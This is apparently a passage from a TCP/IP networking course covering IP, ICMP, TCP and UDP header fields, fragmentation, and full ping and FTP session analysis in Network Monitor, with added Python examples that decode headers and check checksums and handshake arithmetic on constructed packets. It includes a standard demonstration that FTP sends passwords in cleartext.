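The following Python example is added here to illustrate both the IP header walk-through in Topic 1C and the ICMP fields above; it is not code from the course materials. It decodes the header rows in the order a receiver reads them and verifies the two checksums the text describes: the IP checksum, which covers the header only, and the ICMP checksum, which covers the whole message. The packet it decodes is constructed inside the code (an Echo Request from 172.16.10.5 to 172.16.0.1 carrying the 32-byte payload Windows ping sends); those addresses, the identification value and the TTL are assumed sample values, not taken from any course capture. The router_hop function shows why the Header Checksum exists: a router that decrements TTL must recompute it, and a header whose TTL changed without a recomputation fails the check.

```python
import struct

PROTOCOL_NAMES = {1: "ICMP", 6: "TCP", 17: "UDP"}  # the Protocol ID numbers listed in Topic 1C


def internet_checksum(data: bytes) -> int:
    """Ones'-complement sum of 16-bit words (the IP/ICMP/TCP/UDP checksum, RFC 1071).
    Run over a block that already carries a correct checksum, it returns 0."""
    if len(data) % 2:
        data += b"\x00"  # odd length: pad the final word with a zero byte
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:  # fold the carries back into the low 16 bits
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def parse_ipv4_header(pkt: bytes) -> dict:
    """Decode Rows One to Five of the IP datagram (and any Row Six options)."""
    (ver_ihl, tos, total_len, ident, flags_frag,
     ttl, proto, hdr_csum, src, dst) = struct.unpack("!BBHHHBBH4s4s", pkt[:20])
    ihl = ver_ihl & 0x0F                  # header length in 32-bit words, 5 when no options
    hdr_len = ihl * 4
    return {
        "version": ver_ihl >> 4,
        "ihl": ihl,
        "tos": tos,
        "total_length": total_len,
        "identification": ident,
        "reserved_bit": (flags_frag >> 15) & 1,   # first flag bit, 0 by default
        "df": (flags_frag >> 14) & 1,             # Don't Fragment
        "mf": (flags_frag >> 13) & 1,             # More Fragments
        "fragment_offset": flags_frag & 0x1FFF,   # 13 bits, in 8-byte units
        "ttl": ttl,
        "protocol": proto,
        "protocol_name": PROTOCOL_NAMES.get(proto, "other"),
        "header_checksum": hdr_csum,
        # the IP checksum covers the header only, never the data that follows it
        "header_checksum_ok": internet_checksum(pkt[:hdr_len]) == 0,
        "src": ".".join(str(b) for b in src),
        "dst": ".".join(str(b) for b in dst),
        "options": pkt[20:hdr_len],
        "payload": pkt[hdr_len:total_len],
    }


def parse_icmp(msg: bytes) -> dict:
    """Row One of the ICMP message is Type, Code and Checksum; Row Two depends on them."""
    icmp_type, code, csum = struct.unpack("!BBH", msg[:4])
    return {
        "type": icmp_type,
        "code": code,
        "checksum": csum,
        # unlike IP, the ICMP checksum covers the entire message
        "checksum_ok": internet_checksum(msg) == 0,
        "rest_of_message": msg[4:],
    }


def _octets(addr: str) -> bytes:
    return bytes(int(o) for o in addr.split("."))


def build_echo_request(src: str, dst: str, ident: int, payload: bytes, ttl: int = 128) -> bytes:
    """Constructed sample: an ICMP Echo Request (Type 8, Code 0) inside an IPv4
    datagram with no options, with both checksums filled in."""
    icmp = struct.pack("!BBHHH", 8, 0, 0, 0x0200, 1) + payload  # checksum 0, identifier, sequence
    icmp = icmp[:2] + struct.pack("!H", internet_checksum(icmp)) + icmp[4:]
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(icmp), ident, 0,
                      ttl, 1, 0, _octets(src), _octets(dst))
    hdr = hdr[:10] + struct.pack("!H", internet_checksum(hdr)) + hdr[12:]
    return hdr + icmp


def router_hop(pkt: bytes) -> bytes:
    """What a router does on Row Three: decrement TTL, then recompute the header checksum."""
    hdr_len = (pkt[0] & 0x0F) * 4
    hdr = bytearray(pkt[:hdr_len])
    hdr[8] -= 1
    hdr[10:12] = b"\x00\x00"
    hdr[10:12] = struct.pack("!H", internet_checksum(bytes(hdr)))
    return bytes(hdr) + pkt[hdr_len:]


# Constructed sample packet (assumed addresses, ID and TTL; not from a course capture).
SAMPLE = build_echo_request("172.16.10.5", "172.16.0.1", 0x1234,
                            b"abcdefghijklmnopqrstuvwabcdefghi")

if __name__ == "__main__":
    ip = parse_ipv4_header(SAMPLE)
    for key in ("version", "ihl", "total_length", "ttl", "protocol_name",
                "header_checksum_ok", "src", "dst"):
        print("%-20s %s" % (key, ip[key]))
    print(parse_icmp(ip["payload"]))
```

Running the script prints the decoded rows; the same decoder applied to a packet whose TTL byte was edited without a checksum recomputation reports header_checksum_ok as False, which is the integrity property the Header Checksum bullet describes.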

TASK 1D-1
Capturing and Identifying ICMP Messages

Setup: You are logged on to Windows 2000 as Administrator. A command prompt and Network Monitor are running.

1. Begin a new capture.

2. Switch to the command prompt, and ping a valid IP address of another host in your subnet. Wait for the ping to finish, and then minimize the command prompt.

3. In Network Monitor, stop and view the capture.

4. Scroll down the packets captured to identify ICMP messages, or create an ICMP filter.

5. Analyze the captured frames to identify the ping process between your computer and the host you pinged.

6. Compare the messages to the discussion, looking for the following:

a. Source IP Address

b. Destination IP Address

c. Type

d. Code

e. Payload for ping

7. Save this capture as Valid_Ping.cap and close it. You are going to run another capture.

8. Begin a new capture.

9. Switch to the command prompt, ping a known invalid IP address for your network, wait for the ping to finish, and minimize the command prompt. For instance, if you were to ping the address 208.18.24.2, you should receive a message indicating that the request timed out. Or, if you are on the 172.16.10.0 network, you might try to ping the address 172.16.10.201, as that address is unlikely to be in use on your network.

10. In Network Monitor, stop and view the capture.

11. Scroll down the packets captured to identify ICMP messages.

12. Analyze the captured frames, and compare them to the discussion, looking for the following:

a. Source IP Address

b. Destination IP Address

c. Type

d. Code

13. Save this capture as icmpheader.cap, and close the capture.

Topic 1E
Capturing and Identifying TCP Headers

When investigating TCP/IP, you will find that TCP data is encapsulated in the IP datagram. Since you have already looked into the IP datagram itself, at this stage you will examine TCP further. In Figure 1-18, you can see the actual format of the TCP header. There are seven rows of information in the figure, with the critical ones for this discussion being the first five. Just as with IP, when a computer receives the TCP header, it will begin reading on Row One on the left side, bit by bit. Once it reads through Row One, it will read Row Two, and so on.

Figure 1-18: A TCP header with all fields shown.

To work with TCP further, refer to RFC 793.

TCP Header, with All Fields Shown

Using Figure 1-18, we will move through the header, identifying the function of each area. After identifying the header fields, we will use Network Monitor to capture and analyze the TCP header.

• Starting on Row One, on the left side is a field called Source Port Number. This field is a 16-bit number that defines the upper-layer application that is using TCP on the source host.

• The second field on Row One is a field called Destination Port Number. This is a 16-bit field that defines the upper-layer application that is using TCP on the destination host. The combination of an IP address and a port number is often called a socket. A socket pair identifies both ends of a communication completely, by using the host IP address and port and the destination IP address and port.

• Moving onto Row Two, the entire row is a single field called Sequence Number. This is a 32-bit value that identifies the unique sequence number of this packet. The sequence numbers are used to track communication and are part of the reason TCP is considered a connection-oriented protocol.

• In Row Three, you can see that the entire row is also a single field, called Acknowledgement Number. This is a 32-bit value that provides a response to a sequence number. Under normal operations, this value will be the value of the sequence number of the last packet received in this line of communication, plus 1. There will be a value in this field only if the ACK flag is turned on (flags are in the next row).

• Continuing on to Row Four, starting on the left side is a field called Offset (sometimes also called Header Length). This is a 4-bit value that defines the size of the TCP header. Because this is a 4-bit value, the limit on the size of the header is 60 bytes. If there are no options set, the size of the header is 20 bytes.

• Moving to the right is a field called Reserved. This is a 6-bit value that is always left at 0 for functioning hosts using TCP/IP. It is not used for any normal network traffic.

• After the Reserved field are the six Control Flags. Each flag is only 1 bit, either on or off. There are six control flags, and they are listed as follows in the left-to-right order they occupy in the TCP header:

— URG: If this is a 1, the Urgent flag is set.

— ACK: If this is a 1, the Acknowledgement flag is set.

— PSH: If this is a 1, the Push flag is set.

— RST: If this is a 1, the Reset flag is set.

— SYN: If this is a 1, the Synchronize flag is set.

— FIN: If this is a 1, the Finish flag is set.

For a detailed discussion on the flags and their functions, please review that section earlier in this lesson.

• Following the Control Flags on Row Four is a field called Window Size. This is a 16-bit value that identifies the number of bytes, starting with the one defined in the Acknowledgement field, that the sender of this segment is willing to accept.

• Moving on to Row Five, on the left side, there is a field called TCP Checksum. This is a 16-bit value that is used to provide an integrity check of the TCP header and the TCP data. The value is calculated by the sender, then stored, and the receiver compares the value upon receipt.

• Following the TCP checksum on Row Five is a field called Urgent Pointer. This is a 16-bit value that is used if the sender must send emergency information. The pointer points to the sequence number of the byte that follows the urgent data, and is only active if the URG flag has been set.

• The Sixth Row has only one field, called Options. This is a 32-bit value that is often used to define a maximum segment size (MSS). MSS is used so the sender can inform the receiver of the maximum segment size that the sender is going to receive on return communication. In the event that the options set do not take up all 32 bits, padding will be added to fill the field.

• The Seventh and final Row is the representation of the data. By this point, the header is complete and the data the user wants to send or receive is stored in the packet.
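The following Python example is added to illustrate the TCP header rows above together with the three-way handshake and four-part teardown examined in Tasks 1B-4 and 1B-5; it is not code from the course materials. It decodes Row Four (Offset, Reserved, and the six Control Flags in their header order) and then applies the SEQ/ACK arithmetic the text gives, each ACK number being the peer's sequence number plus 1, to locate the handshake and the teardown in a list of frames. The nine frames it works on are constructed in the code as a short Telnet-style exchange (client port 1035 to server port 23, initial sequence numbers 1000 and 5000); those values are assumptions, not figures from a course capture. The checksum word in the constructed segments is left at 0 because computing it needs the IP pseudo-header, which this example does not model.

```python
import struct

MASK32 = 0xFFFFFFFF
# the six control flags, left to right as they sit in Row Four of the header
FLAG_BITS = {"URG": 0x20, "ACK": 0x10, "PSH": 0x08, "RST": 0x04, "SYN": 0x02, "FIN": 0x01}


def parse_tcp_header(seg: bytes) -> dict:
    """Decode the fixed 20-byte TCP header; Offset says where the data begins."""
    (sport, dport, seq, ack, off_res_flags,
     window, csum, urg_ptr) = struct.unpack("!HHIIHHHH", seg[:20])
    data_offset = off_res_flags >> 12        # 4 bits, in 32-bit words (5 = 20 bytes)
    reserved = (off_res_flags >> 6) & 0x3F   # 6 bits, 0 on functioning hosts
    flags = off_res_flags & 0x3F             # 6 bits: URG ACK PSH RST SYN FIN
    hdr_len = data_offset * 4
    return {
        "src_port": sport, "dst_port": dport,
        "seq": seq, "ack": ack,
        "header_length": hdr_len, "reserved": reserved,
        "flags": {name for name, bit in FLAG_BITS.items() if flags & bit},
        "window": window, "checksum": csum,
        "urgent_pointer": urg_ptr if flags & FLAG_BITS["URG"] else None,  # valid only with URG
        "options": seg[20:hdr_len],
        "data": seg[hdr_len:],
    }


def build_segment(sport, dport, seq, ack, flags, data=b"", window=16384) -> bytes:
    """Constructed segment with no options; checksum left at 0 (needs the IP pseudo-header)."""
    bits = sum(FLAG_BITS[f] for f in flags)
    return struct.pack("!HHIIHHHH", sport, dport, seq, ack, (5 << 12) | bits, window, 0, 0) + data


def find_handshake(segs):
    """1-based frame numbers of the SYN, SYN/ACK and ACK that open a session, or None.
    Checks the text's rule: each ACK number equals the peer's SEQ number plus 1."""
    for i, a in enumerate(segs):
        if a["flags"] != {"SYN"}:                # first packet: SYN and no other flag
            continue
        for j in range(i + 1, len(segs)):
            b = segs[j]
            if (b["flags"] == {"SYN", "ACK"} and b["src_port"] == a["dst_port"]
                    and b["ack"] == (a["seq"] + 1) & MASK32):
                for k in range(j + 1, len(segs)):
                    c = segs[k]
                    if ("ACK" in c["flags"] and "SYN" not in c["flags"]
                            and c["src_port"] == a["src_port"]
                            and c["seq"] == (a["seq"] + 1) & MASK32
                            and c["ack"] == (b["seq"] + 1) & MASK32):
                        return (i + 1, j + 1, k + 1)
    return None


def find_teardown(segs):
    """1-based frame numbers of the four teardown parts (FIN, its ACK, the second
    FIN, its ACK), or None. A FIN consumes one sequence number, so the ACK for it
    is SEQ + data length + 1. When a host sends its ACK and its own FIN in one
    segment, the middle two numbers refer to the same frame."""
    def next_match(start, pred):
        return next((n for n in range(start, len(segs)) if pred(segs[n])), None)

    for a_i, a in enumerate(segs):
        if "FIN" not in a["flags"]:
            continue
        want = (a["seq"] + len(a["data"]) + 1) & MASK32
        b_i = next_match(a_i + 1, lambda s: s["src_port"] == a["dst_port"]
                         and "ACK" in s["flags"] and s["ack"] == want)
        if b_i is None:
            return None
        c_i = next_match(b_i, lambda s: s["src_port"] == a["dst_port"] and "FIN" in s["flags"])
        if c_i is None:
            return None
        want2 = (segs[c_i]["seq"] + len(segs[c_i]["data"]) + 1) & MASK32
        d_i = next_match(c_i + 1, lambda s: s["src_port"] == a["src_port"]
                         and "ACK" in s["flags"] and s["ack"] == want2)
        return None if d_i is None else (a_i + 1, b_i + 1, c_i + 1, d_i + 1)
    return None


# Constructed sample exchange (assumed ports and sequence numbers, not a course capture).
CLIENT, SERVER = 1035, 23
SAMPLE_FRAMES = [parse_tcp_header(s) for s in (
    build_segment(CLIENT, SERVER, 1000, 0, ["SYN"]),                    # 1: SYN
    build_segment(SERVER, CLIENT, 5000, 1001, ["SYN", "ACK"]),          # 2: SYN/ACK
    build_segment(CLIENT, SERVER, 1001, 5001, ["ACK"]),                 # 3: ACK, session open
    build_segment(CLIENT, SERVER, 1001, 5001, ["PSH", "ACK"], b"hi\r\n"),  # 4: 4 bytes of data
    build_segment(SERVER, CLIENT, 5001, 1005, ["ACK"]),                 # 5: data acknowledged
    build_segment(CLIENT, SERVER, 1005, 5001, ["FIN", "ACK"]),          # 6: client FIN
    build_segment(SERVER, CLIENT, 5001, 1006, ["ACK"]),                 # 7: ACK of that FIN
    build_segment(SERVER, CLIENT, 5001, 1006, ["FIN", "ACK"]),          # 8: server FIN
    build_segment(CLIENT, SERVER, 1006, 5002, ["ACK"]),                 # 9: ACK, session closed
)]

if __name__ == "__main__":
    for n, f in enumerate(SAMPLE_FRAMES, 1):
        print(n, f["src_port"], "->", f["dst_port"], sorted(f["flags"]), f["seq"], f["ack"])
    print("handshake frames:", find_handshake(SAMPLE_FRAMES))
    print("teardown frames: ", find_teardown(SAMPLE_FRAMES))
```

The same two functions can be pointed at frames decoded from a real capture; the only requirement is that each frame be a dict with the keys parse_tcp_header produces.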

TASK 1E-1
Capturing and Identifying TCP Headers

Setup: You are logged on to Windows 2000 as Administrator. A command prompt and Network Monitor are running.

1. Begin a new capture.

2. Switch to the command prompt and initiate a Telnet session to a neighboring host. Whether or not it connects at this time is not important, so the Telnet service does not need to be on.

3. If the Telnet session starts, exit the Telnet session; otherwise, close the command prompt.

4. Stop and view the capture.

5. Add a filter so that all you see are TCP frames. For the specific steps to add filters, see Task 1B-1, step 12 through step 16.

6. Analyze the TCP headers in the frames.

7. When analyzing the headers, look for the following:

a. Sequence Numbers

b. Acknowledgement Numbers

c. Source Port Numbers

d. Destination Port Numbers

8. Once you have analyzed the header, save the capture as Telnet_Attempt.cap, and close the capture.

Topic 1F
Capturing and Identifying UDP Headers

Compared to TCP, UDP is a very simple transport protocol. The UDP header and data will be completely encapsulated in the IP datagram, just as with TCP. In Figure 1-19, you can see the actual format of the UDP header. There are three rows of information in the figure. Just as with TCP, when a computer receives the UDP header, it will begin reading on Row One on the left side, bit by bit. Once it reads through Row One, it will read Row Two, and so on.

Figure 1-19: A UDP header with all fields shown.

Using Figure 1-19, we will move through the header, identifying the function of each area. After identifying the header fields, we will use Network Monitor to capture and analyze the UDP header.

• Starting on Row One, on the left side is a field called Source Port Number. This field is a 16-bit value that defines the upper-layer application that is using UDP on the source host.

• The second field on Row One is called Destination Port Number. This field is a 16-bit value that defines the upper-layer application that is using UDP on the destination host.

• On the Second Row, the field on the left is called UDP Length. This is a 16-bit value that identifies the length of the UDP data and the UDP header.

• The second field on Row Two is a field called UDP Checksum. This is a 16-bit value that is used to provide an integrity check of the UDP header and the UDP data. The value is calculated by the sender, then stored, and the receiver compares the value upon receipt.

• Row Three is where the actual user data is stored. It is possible for a user to send a UDP datagram with zero bytes of data.

TASK 1F-1
Working with UDP Headers

Setup: You are logged on to Windows 2000 as Administrator, and Network Monitor is running.

1. Browse your course CD-ROM to find a folder called \085545\Data\Captures. In that folder is a file called tftp.cap. Open tftp.cap in Network Monitor.

To work with UDP further, refer to RFC 768.

UDP Header, with All Fields Shown

2. Expand the details of any UDP frame, and compare it to the discussion. Look for the following:

a. Source Port

b. Destination Port

c. What the actual UDP data is

3. As you are analyzing this traffic, verify that no session was established, as UDP is connectionless.

4. Close the capture.

Topic 1G
Analyzing Packet Fragmentation

Packet-switched networks will all, at one time or another, experience fragmentation. This is due to the fact that all complex networks are made up of various physical media and configurations. So, a packet of a certain size might fit fine on one segment, but may suddenly be many times larger than the capacity of the next segment. The size limit that is allowed to exist on a network varies from network to network and is referred to as the Maximum Transmission Unit (MTU).

In the event that a datagram gets fragmented, it is not reassembled until it reaches its final destination. When the datagram is fragmented, each fragment becomes its own unique packet—transmitted and received uniquely.

TCP segments are sent using IP datagrams. TCP expects a one-to-one ratio of segments to datagrams. Therefore, IP on the receiving end must completely reassemble the datagram before handing the segment to TCP. In the relationship between TCP and IP, the following rules that affect fragmentation are defined:

• The TCP Maximum Segment Size (MSS) is the IP Maximum Datagram Size minus 40 octets.

• The default IP Maximum Datagram Size is 576 octets.

• The default TCP Maximum Segment Size is 536 octets.

Fragmentation will rarely happen at the source of a datagram, but it is possible. For example, a receiving host might say it can accept segments that are many times larger than what the sender normally sends. Another example would be a host on a small-packet-sized network, such as PPP, using an application with a fixed-size message.

The common location then for fragmentation is at a gateway, where the odds of different MTUs on different interfaces are very high. The following list shows the MTU for various media:

• PPP: 296 bytes

• Ethernet: 1500 bytes

• FDDI: 4352 bytes

• Token Ring (4 MB/s): 4464 bytes

• Token Ring (16 MB/s): 17914 bytes

Fragmentation Rules

The official minimum MTU is 68, and the maximum is 65535.
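The following Python example is added to work through the fragmentation rules above; it is not code from the course materials. It models what a gateway does when a datagram built for one MTU must cross a link with a smaller one: it splits the payload so that every fragment fits, keeps the Identification value constant, counts the Fragment Offset in 8-byte units as the 13-bit field does, sets MF on every fragment but the last, and refuses to fragment when DF is set. A receiver-side check then shows what the destination host needs before it can reassemble (one ID, contiguous offsets, exactly one fragment with MF cleared, and it must be the last one). The MTU values and the MSS rule come from the text; the 20-byte header length (no IP options) and the sample datagram sizes are assumptions.

```python
# MTU values from the list in the text, and the legal MTU range from the sidebar
MTU = {"PPP": 296, "Ethernet": 1500, "FDDI": 4352, "TokenRing4": 4464, "TokenRing16": 17914}
MIN_MTU, MAX_MTU = 68, 65535
IP_HEADER_LEN = 20   # assumed: IP header with no options


def tcp_mss(max_datagram: int) -> int:
    """TCP Maximum Segment Size = IP Maximum Datagram Size minus 40 octets."""
    return max_datagram - 40


def fragment(ident: int, payload_len: int, mtu: int, df: bool = False,
             hdr_len: int = IP_HEADER_LEN) -> list:
    """Split a datagram's payload for a link with the given MTU, as a gateway would.

    Returns one (identification, MF, fragment_offset, payload_bytes) tuple per
    fragment. The offset is in 8-byte units, exactly as carried in the 13-bit
    Fragment Offset field, and MF is the More Fragments bit.
    """
    if not MIN_MTU <= mtu <= MAX_MTU:
        raise ValueError("MTU %d outside the legal range %d..%d" % (mtu, MIN_MTU, MAX_MTU))
    if hdr_len + payload_len <= mtu:
        return [(ident, 0, 0, payload_len)]      # fits as-is: offset 0, MF 0
    if df:
        # Don't Fragment is set: the gateway must drop the datagram rather than split it
        raise ValueError("DF set but %d-byte datagram exceeds MTU %d"
                         % (hdr_len + payload_len, mtu))
    # every fragment except the last carries a multiple of 8 payload bytes, so
    # the next fragment's offset can be expressed in the 13-bit field
    per_fragment = (mtu - hdr_len) // 8 * 8
    frags, offset = [], 0
    while offset < payload_len:
        chunk = min(per_fragment, payload_len - offset)
        more = offset + chunk < payload_len
        frags.append((ident, int(more), offset // 8, chunk))   # same ID on every fragment
        offset += chunk
    return frags


def fragments_reassemble(frags: list) -> bool:
    """Receiver-side check that reassembly can succeed: a single ID throughout,
    offsets contiguous from 0, and MF cleared only on the final fragment.
    Reassembly happens only at the destination host, never at a gateway."""
    if not frags or len({f[0] for f in frags}) != 1:
        return False
    expected = 0
    for n, (_ident, mf, offset, length) in enumerate(frags):
        if offset * 8 != expected:
            return False                        # a gap or overlap in the data
        if (mf == 0) != (n == len(frags) - 1):
            return False                        # MF must be 1 on all but the last
        expected += length
    return True


if __name__ == "__main__":
    # constructed case: a full-size Ethernet datagram (20 + 1480 bytes) entering a PPP link
    for ident, mf, offset, length in fragment(0x1A2B, 1480, MTU["PPP"]):
        print("ID=%#06x MF=%d offset=%4d (%5d bytes in) length=%d"
              % (ident, mf, offset, offset * 8, length))
    print("default MSS:", tcp_mss(576), " Ethernet MSS:", tcp_mss(MTU["Ethernet"]))
```

The PPP case mirrors what Task 1G-1 has you read out of fragment.cap: the first fragment has offset 0, each following fragment has a larger offset, the IP ID never changes, and only the final fragment has MF at 0.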


Figure 1-20: How fragmentation works.

TASK 1G-1
Analyzing Fragmentation

Setup: You are logged on to Windows 2000 as Administrator, and Network Monitor is running.

1. On the course CD-ROM, navigate to the \085545\Data\Captures folder, and open fragment.cap in Network Monitor.

2. Expand the details of frame 1, looking for the Fragment flag.

3. Observe that, in frame 1, there is no Fragment Offset, as this is the first fragment.

4. Select several consecutive frames. Observe that each successive frame has a higher Fragment Offset as it gets farther from the beginning of the original datagram.

5. Observe that the IP ID stays constant for each fragment.

6. Expand the details of frame 16.

7. Observe that the Fragment flags are now both 0, indicating this is the last of the fragments.

8. Close the capture.

How Fragmentation Works

Topic 1H
Analyzing an Entire Session

Now that you have analyzed IP, TCP, UDP, ICMP, fragmentation, handshakes, and teardowns, it is time to put them together. In this topic, you will follow along using two sample captures that were made specifically for this purpose. One capture is a PING capture, and the other is an FTP capture. By analyzing them, you will see completely how TCP/IP functions—from start to finish.

About the Tasks

In the following tasks, Windows 2000 Network Monitor was used to capture a ping between two hosts and an ftp session between two hosts. The ping and ftp commands were run from the command prompt, and the output saved to the text files ping.txt and ftp.txt, respectively. The Network Monitor captures were saved to files ping.cap and ftp.cap, respectively. You can open the TXT files with Notepad to see the commands and responses. You can open the CAP files with Network Monitor and see the frames captured as a result. Let’s take a look.

TASK 1H-1
Performing a Complete ICMP Session Analysis

Objective: To use the supplied capture and text files to examine the TCP/IP headers, in order to understand how a session is set up, used, and torn down.

Setup: You are logged on to Windows 2000 as Administrator, and Network Monitor is running.

1. Start Notepad, and open the file ping.txt. This file is on your course CD-ROM, in the \085545\Data\Captures folder. You should see the output shown in the following graphic.

2. Keep this file open.

3. Switch to Network Monitor, and open the file ping.cap. It’s also located on your course CD-ROM, in the \085545\Data\Captures folder.

4. Observe that frame 1 is an Ethernet broadcast trying to resolve the target IP address to its MAC address.

5. Observe that frame 2 is a reply from the target machine with the appropriate resolution. From now on, the two hosts can communicate.

6. Observe the next two frames. They are ICMP echo messages going back and forth between the two hosts, corresponding to the output in the text file. Examine the ICMP messages, and see the details in frames 3 and 4 as shown in the following graphics.

7. Observe that, for the ping command, no session was set up or torn down—just a simple ICMP echo request, followed by an ICMP echo reply.

Continuing the Complete Session AnalysisIn the last task, one host successfully pinged another, in preparation for establish-ing an FTP transaction. We’ll look at the FTP portion of the session, but beforewe do, a quick differentiation between active and passive FTP is in order.

FTP CommunicationUp to this point you have been examining ICMP communication. Now you willexamine an active FTP session. There are two different types of FTP, somethingthat many administrators are unfamiliar with. The two FTP types are simplycalled passive and active.

The mode most people think of with FTP is active FTP. In active FTP, a client makes a connection to the FTP server. The client uses a port higher than 1024 (we’ll call it X) to connect to the server, which then uses port 21, and the FTP command and control session is established. The server responds with the data transfer, sent on port 20. The client will receive the data transfer on a port one higher than the client used for command transfer, or X+1.

In passive mode FTP, the client initiates both connections between the client and the server. When the FTP client begins an FTP session, the client opens two ports (again one higher than 1024, and the next port higher, or X and X+1). The first connection and port is the session to the server for command and control on server port 21. The server then opens a random port (again higher than 1024, referred to as Y in this section), and sends this port information back to the client. The client then requests the data transfer from client port X+1 to server port Y.

When active FTP is used, there can be a situation that firewalls dislike. The first part of the FTP session, from client to server, is not a problem. However, when the server responds to the client, it can seem to the firewall to be a new session started from an untrusted network, trying to gain access to the private network.

Passive FTP solves this problem on the firewall, as both parts of the FTP session originate from the FTP client, and no session starts from an untrusted network. There is a different problem with passive FTP. This problem is not on the firewall, but on the server configuration itself. Because the FTP client starts both sessions, the FTP server must be able to listen on any high port, meaning all high ports must be open and available. To deal with this situation, many FTP applications now include features that limit the port range that the server can use.

TASK 1H-2

Performing a Complete FTP Session Analysis

Objective: To use the supplied capture and text files to examine the TCP/IP headers, in order to understand how a session is set up, used, and torn down.

Setup: You are logged on to Windows 2000 as Administrator. Notepad and Network Monitor are running.

1. Switch to Notepad, and open the file ftp.txt. This file is located on your course CD-ROM in the same folder as the other files. You should see the results shown in the following graphic.

2. Observe that, in this session, when the ftp server asks for a password, the user enters it but it is not recorded on screen.

3. Switch to Network Monitor, and open the file ftp.cap. You should see results similar to those shown in the following graphics. (Depending on the version of Network Monitor you are using, MAC and IP addresses might be displayed in Hex, and the time might be in a different format.)

There are 51 frames involved in this capture.

4. If you would like to change the color of the FTP packets for easier viewing, choose Display→Colors. Scroll down and select FTP; then, from the Background drop-down list, select a mild color such as gray or teal, and click OK. If you select a darker color, it might make it more difficult to read the text.

If you would like to change the format of the addresses from Hex to more readable names, choose Display→Addresses, and click Add. In the box that is displayed, enter FTPSITE for the Name, add 002B32CFC72 for the Address, verify that the Type is Ethernet, and click OK. Click Add again, then enter LOCAL for the Name, add 0002B32C5B13 for the Address, verify that the Type is Ethernet, and click OK twice.

5. Observe that frames 3, 4, and 5 represent the TCP handshake involved in establishing the session. Frames shaded gray (6, 8-9, 11-12, 14, 16-19, 23, 29, 31-34, 38, 44, and 46-47) are all directly involved with the ftp application—authentication, ftp requests for directory information, an actual file transfer, followed by a quit, and bye response.

6. Observe that in frame 8, you can see the user name being supplied.

7. Observe that in frame 9, you can see the request for a password.

8. Observe that in frame 11, you can see the password being supplied. Isn’t this a good enough reason to employ some secure authentication such as encryption?

9. Let’s view the three-way handshake frames in a bit more detail.

Frame 3 starts the three-way handshake Active Open by setting the SYN bit to 1, offering source port no. 2025 (07E9 in Hex), while at the same time directing the request to port number 21 (15 in Hex) on the server. A sequence number 2052360112 (7A5487B0 in Hex) is associated with this frame to uniquely identify it, even in the event of multiple sessions between the same two hosts.

10. Let’s look at the reply.

The reply from the ftp server in frame 4 includes an ACK, while simultaneously including a SYN. This is the Passive Open.

11. Observe that frame 5 includes an ACK from the client.

Once the session is established, FTP can continue on with its setup. This includes a login and a password (to be supplied if anonymous access is not supported), followed by file requests.

12. Observe that frame 6 shows the ftp server asking for user identification. Frame 8 shows the ftp client supplying the user name of testuser.

13. Observe that this is met by the ftp server asking for the password in frame 9.

14. Observe that in frame 11, you can see the password being offered. Because no secure methods for authentication were set up, you can see the actual password (the word “plaintext”).

15. Observe that once the user has been authenticated, the ftp session is allowed to continue. The ftp server puts out the welcome message shown in frame 12.

16. Observe that the rest of the frames dealing with FTP—frames 14, 16-19, 23, 29, 31-34, 38, and 44—have to do with directory listings and file transfers.

17. Observe that in frame 38, you can see the actual contents of the file as it is being transferred. In this case, and because it is just a text file, you can read the contents.

18. Observe that in frame 46, you can see the client attempt to close the connection with the Quit command.

19. Observe that in frame 47, you can see the server communicate with the client with the message “See ya later.”

20. Observe that these messages are followed by TCP terminating the session from both ends in frames 48 and 49, and 50 and 51, respectively, where the FIN bits are set to 1 and the corresponding frame contains the ACK bit set to 1.

21. Close Network Monitor. If you are prompted to save addresses, click No.

22. Close Notepad.
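The walk-through above can be reproduced mechanically. The following Python is an added example, not part of the course or its capture files: it replays a constructed frame list modeled on the ftp.cap session (same endpoints and frame numbers, and the client's sequence number from frame 3), verifies the SYN/SYN-ACK/ACK and FIN/ACK arithmetic, and lifts the USER and PASS lines out of the payload to show exactly what anyone on the path reads when FTP authenticates in the clear. The server's initial sequence number, the reply texts and the omission of pure-ACK frames are constructed for the example.

```python
"""Frame-by-frame TCP/FTP session reconstruction (added example, not course code).

The frames are CONSTRUCTED to mirror the ftp.cap session of Task 1H-2: client
172.16.30.2:2025 to server 172.16.30.1:21, the same frame numbers, and the client
ISN 0x7A5487B0 read from frame 3.  The server ISN, the reply texts and the omission
of pure-ACK frames are invented so that the sequence arithmetic is consistent."""
from dataclasses import dataclass, field


@dataclass
class Frame:
    no: int          # frame number as Network Monitor would list it
    src: str         # "ip:port" of the sender
    dst: str
    flags: str       # subset of "SAFP": SYN, ACK, FIN, PSH
    seq: int
    ack: int
    payload: bytes = b""


CLIENT = "172.16.30.2:2025"
SERVER = "172.16.30.1:21"
C = 0x7A5487B0   # client ISN (frame 3 in the task)
S = 0x1C3D5E00   # server ISN, constructed
# Rule being checked: next seq = seq + len(payload) (+1 for a SYN or FIN), and
# the peer's ACK must equal that value.  Payload byte counts are in the comments.
FRAMES = [
    Frame(3, CLIENT, SERVER, "S", C, 0),
    Frame(4, SERVER, CLIENT, "SA", S, C + 1),
    Frame(5, CLIENT, SERVER, "A", C + 1, S + 1),
    Frame(6, SERVER, CLIENT, "PA", S + 1, C + 1, b"220 FTP server ready\r\n"),     # 22
    Frame(8, CLIENT, SERVER, "PA", C + 1, S + 23, b"USER testuser\r\n"),           # 15
    Frame(9, SERVER, CLIENT, "PA", S + 23, C + 16, b"331 Password required\r\n"),  # 23
    Frame(11, CLIENT, SERVER, "PA", C + 16, S + 46, b"PASS plaintext\r\n"),        # 16
    Frame(12, SERVER, CLIENT, "PA", S + 46, C + 32, b"230 User logged in\r\n"),    # 20
    Frame(46, CLIENT, SERVER, "PA", C + 32, S + 66, b"QUIT\r\n"),                  # 6
    Frame(47, SERVER, CLIENT, "PA", S + 66, C + 38, b"221 See ya later\r\n"),      # 18
    Frame(48, SERVER, CLIENT, "FA", S + 84, C + 38),
    Frame(49, CLIENT, SERVER, "A", C + 38, S + 85),
    Frame(50, CLIENT, SERVER, "FA", C + 38, S + 85),
    Frame(51, SERVER, CLIENT, "A", S + 85, C + 39),
]


@dataclass
class Session:
    state: str = "CLOSED"
    handshake: list = field(default_factory=list)    # frame numbers of SYN, SYN/ACK, ACK
    teardown: list = field(default_factory=list)     # frame numbers carrying FIN
    ftp_lines: list = field(default_factory=list)    # (frame no, direction, text)
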